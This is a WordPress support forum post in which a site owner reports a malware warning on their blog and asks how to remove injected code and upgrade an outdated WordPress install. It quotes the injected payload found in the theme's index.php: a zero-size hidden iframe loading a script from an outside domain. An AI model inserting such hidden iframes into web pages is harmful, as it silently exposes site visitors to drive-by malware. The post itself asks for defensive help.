Support » How-To and Troubleshooting » [help required] suspected iframe malware injected

[help required] suspected iframe malware injected

  • hello. i have of late been receiving this message when i go my site’s url :

    the website yo are visiting appears to cpntain malware. malware is malicious software that may harm your compiter or otherwise operate without your consent. your computer can be infected just by browsing to a site with malware, without any further action on your part.

    for detailed information about problems facing this sits, or a portion of this site, visit Google Safe Browsing diagnostic page for www . mysite url .com”

    i looked into the index.php file of my wordpress theme and found this code whoich i thought was malicious:

    <iframe src=”http:**mega-statistic.org/1/in.cgi?2″ width=”0″ height=”0″ frameborder=”0″></iframe>

    i deleted the code and uploaded the file again and this time it was fine. However I got the attack again.

    i want to know how can i protect my blog from such repeated attacks. I am running an ancient version of wordpress. whats the easiest way of upgrading to the latest version without losing site’s look etc. (i dont understand code, so I am looking at a simple HOW-TO)

    also how can I scan my wordpress files to make sure the injected malware code is permanently deleted and never comes back?

Viewing 2 replies - 1 through 2 (of 2 total)
Viewing 2 replies - 1 through 2 (of 2 total)
  • The topic ‘[help required] suspected iframe malware injected’ is closed to new replies.
Skip to toolbar